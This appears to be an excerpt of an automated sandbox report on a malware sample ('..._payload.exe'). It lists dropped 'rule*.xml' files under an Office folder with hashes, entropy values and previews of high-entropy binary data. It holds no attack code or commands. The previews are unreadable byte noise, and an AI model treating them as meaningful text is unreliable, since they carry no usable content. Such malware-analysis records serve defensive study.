                                                                                                      Preview:<?xml{pD..,...k.&../.nE....i..z2N|!.L.Og..!...<...Ia....o..}Jl...e....#.u.d......4D.{..N...........l.........z.....:.M.A..T.\8........B.v.D.P.f..q...^...+ThQH.1Lo.4..>..z ........".J......t.u..H\>.j^C......ZB....6.h..8O.4^K..y3._.G.1...1S....c..Q..5...^b.Hsx.c.~.Q.....y..63i6...P..........V.c...*Aw..Ev.6qYxp....).W...b....;B......z.{..6.....q<.$2.m..Q.s..A.z..>*...8..X9j j.....~...`..9.P..r_.*.QP.....,....!u..I.....3C..........q.i."..J..di..r#.K...K.=.ZS..]..".:97.A.....B4 ..<.#..".B....[.9s.V(i.0..ea....J..w...ibm...])..T.J...#..K....U<....e)..7.c.../.Wf..h......V...^..y./yJ.U...._...u.K..>\t..Y)..x.^.`....o)..;.I..D..|.....^.......$.qw.&H...|.B!b.L,R.....n.Z..e.x"....O...^..o...v`.-...l..,..C......x..$..z.^.Afd.`.\\.d.!>...m...1/...0t.G........W......7.C.UL..p.........w...`4y..\$_.yyu.];...\.j/.K..U[...O...OR...r1..v{7..z.F...O.#......zZ. .0C..|.L..|..p....$.@.c....L......i...j.x.V!...y.|.r....p?...=U..O...........3;...SG\xw...y.UiN..?..(W.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10881v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):823
                                                                                                      Entropy (8bit):7.724767343667182
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:CAJUUWOWhswQZ0wpAD1o5KSSDQ/fyF3G61wUMx4YZWcbaD+Nv6bD:CxUWOWawQZ0wpdgSScaNXMxKceDwwD
                                                                                                      MD5:487047D6BB37A6A6942E84D07E0DF306
                                                                                                      SHA1:F38CF10720E322703C364CA54E6A843297B01C6B
                                                                                                      SHA-256:3047E67A8901559E08E5AB0DF271EB1A207E0E1A55B4C926410D7F2FA1C4D146
                                                                                                      SHA-512:8A79C904EB5D8D2F0A973BAF62C8972AAC64FBF22817AC505CCEC509EC92DDBEE6BF3CB08D785FAEF6483E79A5C7ECB43E015A4173B47F2EF8888A32F1F6DE27
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Od..1ve=.c.K.r.E...m..zO;.0..b./.....=.= .lK..WC.mN.....fah`..sA.E.D......^@..V.q..Xa....U9.Rwl$..6PcCA...yDN.....17..U.u7...M @.9~.!...U../....C.6...k^.6B....[.V.Y.7gh..5._.....LCNw3.....f.[..L.$o.|....9)....F.PK...eQ.. ).rg*...0.1.iV)B1....^..#=.D'.3..........w.rh6..p.~.y.0.]/|..h.E...L.r....W.U8 ..M...-..(....$l_..!.f.!.....F=].2z....J3.tUp.W......+.X..."K..v.1...$..n...|.|\.i..<}.kc...E.?.<..Q.HI.e...67'.6.{.t..p..R..Ae3.s. ..b..../q^..Q .o.U.zWf..`..A...>GM....V.EL.??...9e}%........^.CG.l.....,:h...S..]."d3.(....`~..."......4..X...=...+.!...3.G.z.t.g.7.?....<.....%.....%a_@..9.!.^....p...6.(.9.1m.vo.6.rQ.........[.... TC...v.3...xM0j;.Z..V.N.eU./..'...MZ.Gw..|! .)m?..B.){..W.~i......S...(!m.t.\.y.VhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10882v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3017
                                                                                                      Entropy (8bit):7.932090682446807
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:dHuUwg2MqDZ7JvNvqaLu9wkNhXTjehdDY3BkjA3Yz2TelrYqR9fiJL9pSvwD:1uU7fqDZlNiagbTjcRYx7Els08JL9pSE
                                                                                                      MD5:CD2C2A081BDEA49A4522E29A9BB58596
                                                                                                      SHA1:95634A30C7055CE75A166A147B2C8D62FFD4FDE5
                                                                                                      SHA-256:32A6FDFE28A3E673480969221EE9890F7E854BF66FC4C0C739CFD1AB083F4053
                                                                                                      SHA-512:404FB93CCC11A38B0505907D84A9E416DD7213C1A5EB60695723BEF2D28A55204C1345E737DA4EF4C5CDDB70E0EE66A6B2EDC2CBB8B805BEB4DD8BDD3D59795C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..oLK.tU.l..1.B:...q*..Z$0%.e...#.j.Q.Y..g...h.+.O]. .).{g\.;.m..V...g.FoE..k1 *..p..g.6n.V[#..P.w.%.R7......YPDC."...._S..*...8..&/....Bh.(9....;.....u4.jZ.....8....lfN=...]..g.(...j.....I.K...6.l....d./...........o.. .=...*...6.......&..f.[50?.).Qs..E...D;...k...(+.k|....^.u&..."...0.&B.%...N..V....J.AP....(Ng....,.H..BG.++.........s.....7[#.&).J..Xm..a3tZo..'Y.;C.Z,...-.9Yd2.[....ro...W.@.Gs-rw.".Y.a..XX....5..J.qTy..8....4@........^.w6..*"8A.....L.1U..D.H/....(.....X.j....sxB...$..x\..*.....w..oI.....`..im./.........f....q.E.!Y.`.&..H.....-r..2.,h......z.AW.=..=.2.c2I...:....XQ..o..|HI..>U,.Tb..K.(.oi.sS..?..p@g4N.JM..,.._ab..2..9.&.m..9.\y7..P@#6>...+.$.D../:.B.s..s{.6.n.$@.8....~.`K:........E..mRw}..}..*d..r...ozo.cEZw.J..:z...BZu....L..YA.%..+....a...x....^ZC/5@..@2..C.>..a..,._@ud.V.5M~pn).fS.;k.@Vc...K...jX.E7.`D....<l.6.v......#/*..2..>.x....3.b....o..Z...B#q.i...-m...\....g...+R{...K....nj}.d.H.)R9RSM-..L...........ZP.....*.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10902v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1021
                                                                                                      Entropy (8bit):7.7923784256725925
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2M9Gl4ndYuzvCZffASMDtcY/eJBf0AiJvhv6bD:T9Gl4ndYuzvCnMDtcY/effjiphwD
                                                                                                      MD5:2AC32CF2DEAE46FF01C216EFC0536DBD
                                                                                                      SHA1:787D3EC8DA3BEA40AFEC60C033934BC80188C442
                                                                                                      SHA-256:12EDFB5AA881877616D6833056D3C0877E1C83F1A21D2A9FB0926D1E56957BB8
                                                                                                      SHA-512:1C5E5533927EE3C2DBD42DB87535948E64A62CBD3D26FCC55780D2898718340165FA3D687588C94AAD6F0196A0D3ADCE666A9E7572CFF232ADEF9162DC948C59
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.jq.E.2.2B.^.&....N1.....r......m.J.....M.C.....2`.....L..:....\.0..>..].=..!.....RE.a...WP..Nd..g.../../.......,.m.PL....(.ey....S.p....O...Ny1.o.-.........}@.S.....E.I..S..0D...>D......VO.......?.. I.x...5....y.c..(<S_[...(k1..Qs.1...;.o....y......(.^a...z.......|..j....(pm@....4.D...x.....KYG...{.,.U.$9P....\._..5.~..I.M..U..e4rR....{..F.....i.....(.l..V....B..8f..R.&..V.......Rtd.&.a2..........r.or.../`W.y...b.|Q........kC.>.R...uD..3..$.Z.B....6m.P.G:..s..3.H..2._4..p*[..Z.m..l?..<....P.oy).m.6.1..O.V[v.....q.:1.fT.Y......,?...~0.N0.K).$.F.o....._.)rp$.8../........+..O.%v..+.$ef...[c...h.{.~.P.#.QmzQ.:P.X......y...7.SdO..{.6s..$.DX.S,.....q|cX.E..zqi.4.R..kO.0...~..+.b.9..%x.=.C]..L..E..n*.1Ta...V...Ze.Z..bR`.%.."YG..1-Vw....!..#.[......i..)[.njW\.._L..2:3c?...>.L..b.E.......Z<i.(^,.....K)..>8.......]...U}.S.'..:.|(..7.....$}....{.....qX.GHf...J..;[JM......X.....y..)..|b.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10906v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1398
                                                                                                      Entropy (8bit):7.852001397367308
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:xYUO2McX/pzMcMje2YwutyOG2ee6xeE7O/wnLdT3WKgfwum+66IWzv6bD:xYMMcvd0je2Wl8TxeELwfMWzwD
                                                                                                      MD5:C1ED73BE8AE8C3C5234EA51873CA4735
                                                                                                      SHA1:1A04F113D984571E2B0DFB789A9D4FE66A9FD776
                                                                                                      SHA-256:8D40378A4FFF87A71A7B45E98CF750D848947311419FBAF57CFF3B4F9872F6F6
                                                                                                      SHA-512:6C87A4A00CF089651545C2DDAE2DBEAB5A828265D020F36F68B316A5BBE7BEA8606D92217BFD1D5FA48D160A7CAE5F30D2A0F84EEADD5D99CD7626F6F9A07674
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.!..9.e...H/..qpz.W.k....17.O...h.6..h7..P}..*n.9.U..|.o.(#.vm6.|...|.dEN....m..n...Hyt>....5.^...F.i;H.....M..i..e)+..{:w..8.p.*L.T...3..z.}..@.b.IN.W......._..U.........U....)"..s...A.....Jh).......#...&..wE....)..Q.K=......A....S....y...,:.'..=.;.O..W?....JS..X. .....G.sn.......Ni.......h..3/...T`(..ph......_s|........#`...9"....tuZ.+.[...!..c.y....UK.......].y.1.:.b..T$.,Xo....[......f.,O.prv.z.]s.... ..x......rk.....S..........c...p..!&q..q?......@..U..C l-/.p...t..[J..E.n ..T....aC..2..+..0R0...E-...O....L9.v..E.h.8..|....`....^....n...........q...=O]x.......mDt.!.~|C.<".4.....n.....i..eC.9.D'Gz.?.'...b.z...W.............`.77.f.V..(....m..%....2T..0.'...@......FL..!e..H[.'.b...0.v.d....x#U".E"s.M.].+-..@.w.$.... /RLl.T.W.....5n.[.V.D!FL....i....RHjJ..I.o...Td...\......n.v...'wY.M...Kf&...'.O..v.z..,..P...G..K/'...>.}iy..v.......Ha.8.<1.L....jI..?..9l....F.|Vp....LZ.Z.\...Z.B-..#.;}..t...X...B..t..?.....p:...w...Cv.....4v

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10907v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):937
                                                                                                      Entropy (8bit):7.79638489707271
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:qwNKe6IR53hSjijsdVEXJ53NK8E1t2xWt2vbJkv6bD:lMe933pcidxoEWA+wD
                                                                                                      MD5:7DEB165D271FCDA61B2D4F4E21C730A4
                                                                                                      SHA1:744231382BB99A95A601480B73B39D08D5B835AE
                                                                                                      SHA-256:E7CA3872EF15D704336997C130C394710ACF427CBCAE28B6475FBA7B663A6B1E
                                                                                                      SHA-512:7AD540530DE075650B23367086546E33B339994AEEC249D7F2F07B10321642F897A47CF0A4B335FE7539353EEEAC8EB1E11E6B1F300538F9198D659479620B01
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlP.B.......ML...$,........'.+.5..G.).7..X..%'...hBK..i.F$.S/...V..X.].<........4z2....z...<..!F.._d2*s......-...nd.G.I...d...4.G......Z...>....1.|..7E...pq.c.J.d..u..........R...i0.......40..b..>h.J....+,.&.]5a+..s.n7........"zx...=.}....r..*K...LDJw.m2.d`A...|.e!...Q+.....P..K.~..x.a..R.V.-..v+.....y;...>I...c'....\.S......:.....[....bf=mU.!6..tMY`.v.%..YPKG...IU..5 ......._.....q..0.6....(.+...#...i.y..v.#1Y..k..~.S....ty.1.h.....WH.y.....^..?%..d...jr.5.......][..W.N.Zd>mN.3j.W'.B....H...O..;..p.5..wg.&..B...q+r.Kd......56....P.....]...N.>.(..........N.BRz..1...{..c..S.;.y.........".MC..../U..O..R;.I.-~..z..u$......[.. ...1X'.p)8......._v8r:..B.7.V..B......B..1#.]...x.<fWa.jD.V.p..<.....9.w.`M.......{....w....Q._..."..[.....r.G.......d_..O..z.PL..O...,..V.....i.%...q.!..,...C.....V.+..L.....:.}..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10924v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):891
                                                                                                      Entropy (8bit):7.7539828674140345
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:WbTqFdR8icyPbgnZvYscm7Hw1uH1fxylNp6lRh+wPklDRAv6bD:+TIT8xyzYAsH914jp2owsYwD
                                                                                                      MD5:A849D1C73F0C1CB397F8B754F632F528
                                                                                                      SHA1:7B3AC14029962328FAAEEBB2DEE47506683E38C5
                                                                                                      SHA-256:EEED35F795AB0AFD8FA957EC9607840F71A52C7558C8FB497EC5C806DA995A1F
                                                                                                      SHA-512:C4AF980AD41AB6124A211F8DAACDD7829F467C526350EB5A61978D7B967470996D57CD1D27ABFC1125D5E8B377C606F194449A031CFE29E7E1F7052A542B9757
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..J....g...o....?I.._...)..g...g..+..8..Z8....=W.D.J..,...vK..+:[._..y.6..3?)..P..Z..<...w/".hk...P.m...xL.6..`.2x.h.s}.....=_....v.5./......$.T.;:Zk...6...:.8..4.^..S....$..}.oN...II........{.Y...v...d...#vd.3.0.(j.`...FT....=.h..(S.j%..v..@:.....]...rD.w...2......5:q...v..=)I.A$.A.@...TR$.$.F`......B..?.iZ....T.u.....Wi.......P....2.h.....l'.u...|..!Y.....)Y.a..#P!!..."..C......_.V.......kF.#j..[`....w.+.7....}2c..F..@5..Z..-S#/>.].........Fj.....o.o....F..2.n....2..4...~[.\Mc.|. ._..S..S....:y.(r*.3e..6..<QT.....w.v......T....".&)W.CP.JVr.....(.r...m...k...J....K..]3.+.....`..+..UP.Z<........-.Wz.~....P....w.ps.O...N.`V...bb.|....v..c>.+.@.I.}L.~...]W.w..$....qznh..%.....|.......\m.syW..$)B.K$H.d...i...Z.......B.J..i6..mh%'.x....Bm...n.....:_..N.^hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10925v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1049
                                                                                                      Entropy (8bit):7.824046926688295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:B4fExcHpecvbd9Sjn0fAep2VaL4USE7dKkgJVV1C1v6bD:B4KweWmjnAAep20Jhn4V1EwD
                                                                                                      MD5:81393F9559A7239369FF19BB671E8693
                                                                                                      SHA1:4A5E2B099C25C22CD88682774FBAA90CBE4D4C84
                                                                                                      SHA-256:DA824FD4337CA07002C93D55B6A6206DF57DF4DCBA72ABEE71C5CEE79A65A7FF
                                                                                                      SHA-512:B12A3CE1E9B4DDEFEEED116FADD14F2774E5582D4334897BC4DE93E69BB721B0414A24646CC07D004D14EF4E8E29D71A341D20512931BBDCCBA31F600B24F0FF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml2y...-....1..Q".F....rl..5..jl+#.S....O.......x.....z/..K.w...h..........S@t.,FI"'.........I..0..;.\.5]b.rlC.XX'..pBG.b2.3..!.j :.......%.k..i$W... s....@y.x.6P...G.Gb.q....] ....NVW.[..FbN.......B.1z.>&.\...D&.6`......1.^g*...........-.I2..........^..f.Tn.kGB..w......vh......8?..6.q...][.....>.k4...l.Q....!....8........Y.j.....6^....lW^...'...I..,.]&h.....z&..;...... ...Q.V........&..%..p.6K.[.~.....L....Y....I..'>.g.<..q..T.0..w.....Aj.Kl..b......Z...h.8..y^....x.*6..'KTS.......2.bpq.....E....;=.".j[[.K...ov.. g........HX..........s.....Z..Q.N3..........w..X~..e[.=..{}..6.pO.K...........w}.S}F.7.?.H)...&..vB^.........Gu.p.5.......).t.....s.p.`Y.....=.....:.9k=3_?"/.T.....@..b\.8|o...u..,.x..!.J......R....e.J.O.......;.S....H..D._Mg...-..L.P...2UZ.#S.G.{f..H..8S...bj..Q..c..E.(#_C.m.|x.S....B.....2-..%...H.k>^...%*.d.*...F=..?.n\:j.P.....ku.3.9{.J...C|.Au...f,}......].B.>..zo.G...26......2.9Fn...hZRMDGn2o1XdryxaQbOJI60EuHBvA

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10940v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):885
                                                                                                      Entropy (8bit):7.776347043860989
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:am5wMp8Jt0YZZ+c247mmxZx99Ydb6/Yvmv6bD:4XJ6Y3n9k6YOwD
                                                                                                      MD5:5BF486E45EAEBC8340EBBF7E08ED0D7D
                                                                                                      SHA1:87527A03735AEEFCC6D6D93120A6E8E4F8472F8C
                                                                                                      SHA-256:B25D3C30CC97A31F2BCC88ADE00314BE71787F9A073A3073C6FC54FB75ADD1E2
                                                                                                      SHA-512:37DFF450E6CF6EED19CC94AB91F1350495CFB2F57735396CC24AFB79ECBB3137FF88E9C311E839058B3609B13CEE5A3C0DDA23AF56D59A5146E5473CD9BAC008
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.W6.E..{s..n..|.2.....D.8...Q.)..b.....:9P.=A...;......:..Bo._<73t).iW...u.N.Y..g....}..[.....h...nA..Y&C......R."#.[1.sZ>j..TZ.7......\..9...'7.x.T..$x..F.5%-bN.pH..}.kO.:,Rj.X...:.}g_...:.Da...x..X.%.Q.id-...P..6D...d%..)..x.{..;a..........i.JuZ.A........i<L1.../..Ge.....GR...&..O.... ...=...0j......U._..B+6.t...A8......'Vhi.~.C."x.G@...W.d,...[..#.i.CZ.3...c...R.....v.....+=&q...F7y..:../...p..6C.c.5.......1|[...:..N.A..(E....w.E.w....n..K...I.:L`.....Y...d......`oZ.1nh1.JZ....:.*.U...Y>TT...)9.|{.S._..gb.!R..<#Kz_...>qT...D|5....<.r.....`...<y.............t)..U;.fA.....~..h..O.F....2j.z @0y/.n...yTFLN~..Q.*.....z. ...VC..~K.Tor.rVc...P..M.."T ..m.N..r9+..%..}...:r]3.S....V`....q.......u.z...G.t#R.a..Q~ m>.wjR.D)......L.!......+m........w.#R.'./......hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10952v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8529
                                                                                                      Entropy (8bit):7.9771165337144865
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ocroXL5umCCpfxogKh4a3hhTXqDHx/AEPWbLY/8wEVcu7Y:ovXL5aQo/hhTXyRRPW/YG97Y
                                                                                                      MD5:FFEFBB53528A2354DB7137F0D75A2E77
                                                                                                      SHA1:4C7B06E4AFEDFCDD5CE4436A7D90EBEE2E64E6EB
                                                                                                      SHA-256:35931C023DBA8A6D73DC6885FAA589799393880C9A7F8F7C958AD298D8E1B7E0
                                                                                                      SHA-512:A2398180858E0B7A6577FF9FABFAE96E46148E1D12DE403C786ED1C6583ACBBE8AF6C9433A7A48910E1067DBCF7788C7293C773AF46E2C7C53512C787025F639
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml+..S..y...."..M.?.~]..{ u.......2......:.|..>..F.....=X.3p....w...0.&Y.......-.........^...;j.......:..9ez. W(uN.S.j.T...l..[.!.....r...TwJ..y..,w.O..H..{...`.1R.....O.....;.o....o8..r(1}..m,.9.FNx...w.e..sW=H.y*e.3.#.....v..#..g...rHB..19v......k..U_g6N=u.f5....$....`...?.W..._....{...:L:V~o.k.x.Yd......`.s._....M.....M..r._..#.cz.a~..(.J.C.m.s.....s.r.4QJ....1...x......i.u.[3+B).J{`d..*...\3....].o...1..R.....r.d...Hhzv..8q:>.(=.)..i..s+?.....WZ.._[..z.[......6[Xj...Iy\cXo.w...m.H.p2+H...e9n7d....2<...Fy.=f....T.}:o...<lDV.c.d.*C.X#.y..`...PC"...b.K...u.0AD,....)bO,.|.01..)*.Nbiy.{@...o^.l...$.-:F.I..#b6....g-.2.....4....r.. ,d.Z...x.6..R2.o..-..%.4I7G..0L.l..#..$....e..?}u......Se..t.\n.MJX....(....LL.....X=2...E..../.i.....O..l.4?...s..:.O...-.O^n.'Un......Q)......ud.....^..F...|.....G....x.',A$..).N|Rq......>s.|Q.....G......Amk{.......gQ.g..J...-k[...VU....[..J... 7+A.[... ..vey.KN..W.....G.V......_.*....X.]......\!.0.g.....5.]d..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10955v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1242
                                                                                                      Entropy (8bit):7.821682609015982
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bI5QZWK4GTv5AfiMLrsNXwEmWvrJNMk6s2crvzMjD593oxp88wDQv6bD:bInS5MLuokycrvQjD593oxp88rwD
                                                                                                      MD5:C76E733270AA0EE9FEE3A81074CF25BC
                                                                                                      SHA1:1115FDE42B33FCFB10100874760B265BD1E8E23D
                                                                                                      SHA-256:AC80D66A2A6D3E485C48E8DDE620876EECDE71AC941E5002968D79A220C2F4CD
                                                                                                      SHA-512:A6865B3A48D10D3CD3F0D98ECEA650BB354331E85DDD4AE51D869F1BB5CA147D6E5555AFE1D19EF788B79BB6D01587FED99134D9292DC86BA7BCB69F4CE6C7E8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..}I.44.S..!..jm.M.|....7.v;2]$.M..B..$..&VY...M.a.k!1..Q.....H8..l%M..s..!...I.._3M!?....T07.83.).H8n.(....<.aU..ty.....%.=e.....{.AX.@M.VYP..)iP.F..><*.US..1.H?<.8L.).=......?..l.@xC.`6?.....E..{.....u.......3.qh+.|K....3..;.J<a...D...3O..,.5.g:.....>.6.SqF9....._...E..`.|....\+....\....6L.U.~E.......Uv;n..u+a@....A...dV`..8..... ..~....y.G..~%V......'..|..Z...G..=..t.:...9}......D^....5.mM.w..+P......^...._m...........'.<Jq....c_...\.c.S#f..*...p=.G.... 6n.E.&..t./...?J...j\.....{.=..o.+...o...(%....fz'vX.\.#.8...|.A..|.P|...i..:6...{.....{xhL..tXj..V..D...*l.b.., Sc.T6....q.*.i....... 9.Y.&..k.......N..`....Q#...Eh.z..........n5..e1..S......(X.g.Pq........W.O."#=....b...7.]...K.4|.\...b.T5........O.f'J.%..W..ZA$.atN.8%.Z.?m..q.....4 K.O ....>..z..?....q.NDT...~...<.j.Q(W.@....(..[......k..x...Y ;I..u...P'^.f.)...J.q`R....%.Iv4..{..Lg........T...%Uj.x..Y....X....?..L.....i+r.vXo68..!k..i.85.H....3........-...X1.XPh.f.#...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11150v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1185
                                                                                                      Entropy (8bit):7.84656057590698
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tzYUvkQcQdUKnCJZv66bxSuWBLuMptvEPEPeC/CTTux80oUUv6bD:tzrcGhHvK5TxpwD
                                                                                                      MD5:1598DF0750A2BF30C095EF8EF42BE82F
                                                                                                      SHA1:324FE5F0A99D500F482C79DE56B3023FC09EB7F2
                                                                                                      SHA-256:E7A1B1204C7D62F303A9255B47426EA67C93330E6536B0643DA1486E75468B44
                                                                                                      SHA-512:F03B4EC8457F138E7A36EBB0D9F5B6A712E5AC46844D1F4C8CF6BF95FE2159226B61D67CF094DECB26036F95C855C56E71D81F9FBBF448A6F2CA0C8C77E7AF61
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.zi.'C.....O.B..6..w..o.."....4..!...!..'3..$md.^.M..`....q..+8...&w..Yx[..0.b..F% .k.."Z.X..2A.?+3sh.j..@.#......>!Ap..\.O.QR".#..R....z...C.M^.t. ..$[-_4c......].D}.".....We.w0....... S29.......*...ML..X.[.....q....{.s!.B|.5.H./....P.8>.unW<.e=............ ....2...hX....J..1..A..]....nf..|..''...,............?0.U.M.X.....J...H..o..K.6.WM....# .),.......')......!...H..2ntv@.z<......&>@.:.(D...p...m3Dd.........TC..5. .>.C.4....I..=X......W*.I.i.....E.'.~...U.:?xwN(.KN.)...!.....4).G.d..B...H>../..K.G./)...q?..+n.i....X.T..C....G..........>V.9...'.h.Y...jE..K$Y!./.NF......eS..:J.Q1Xx..".]...8v.Q.7...&03;..p......poa~.....zD.5.....Jx....^. 4:..=.9..y..Sf..ld.L....... ..^..............r...8P.k]"`g.&q.O..f...{H.BMz..2....$...V.;h(...n.V.@r.1P..q5.Gd.@.=...o.h....1....7...P|bS..C...=I%;ye.....qV.y...+..^.H....3.u.I.+...-.rS.....f..V4..~..".....S....f.N..vC2..&......&}#..I..uBO.....#.....?.S...+:H.mEV.zVC..f.%5z...Iwcy5x.........xp..h.h..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11154v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1073
                                                                                                      Entropy (8bit):7.798132779972082
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:CNIW8cbVqAc1c1z3qsX5AgJyY++lNCbnRuOQFF6b4bv6bD:CLjngyz3qsp/xXNCsBc4bwD
                                                                                                      MD5:A556616DC947A7E17172A723E798DCE9
                                                                                                      SHA1:96E36C40DBDA90F690E1CC8303063FD11123D8D5
                                                                                                      SHA-256:F150C8E6E0CF0A5BB9C511269E065165B4DFED72DC9F370B1A00F660068FA6FF
                                                                                                      SHA-512:C6435DC5900505928F86005A77FF9A7ECA408A3C0F6AA9563975B11848B8D27BA065D432E2E29673DBDF7DE2E362EDC603B1866C16FD373153D1E4967FDEA8CA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.8'G.hq.U.e3#.dr.K.....x..ks"8n5.E'...a..h_...A..Y.S...V.i.....].)..O}....`..C.^.B....Fg..C.Q....^"A#iu.5h.._.....s....x.3.>9.....+.T...d....7..O....>...6........|.'%...H.'..;l..I..'..)ID.c#-f...a.B....0c9.s...Q.Z..o....X.Pv..g...>6.m.qK+.....&$),X.2."...T.3..o..C~...@..>.A.v.....0.....lOT.......ZT%MnSF..d..wC....<...M}...8\.....Gk.0......1.>.,....4/{..h..w8.y...........O3<....J.... .-.....J9.....-.j.yi>.?M...OI.LA.~o.c.#...&.n....#....N)..Y.n.hS*.qg.R~..hv{.4..v...vb.......@..f<rJ.Q_.A..`..r.".bp!.U.~.kc...oZ.V....A.E..JS..-.A..6D..(et.wW.|..f..]?.|_/..=.....vW..X.]....Y..p.O|86...M..1..6.jK.:.{.MV...Bl`..../.i .I....s.;....rah..B...n.H..r..`....iyW....f.._...2.;..2....g.2.."D.`....Ld^..t.<.........-..9..+....a.".g.E!z.k.l.BulV3...j.6.A... P.S.3.....b..X..5..).. "8).}H....Wj7.u../....*.YWB..Z.5..8..]Cj...rK.#:!.0n1....;..lz@2.k...[kz..[a...![.vR.Aw........0 fTNh.....8....=_%.".....!.{W.V5..i.}..Q]K^...._..N.'...C..^.ktJN.......}..G.?..0ihZRMD

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11187v1.xml

                                                                                                      Download File
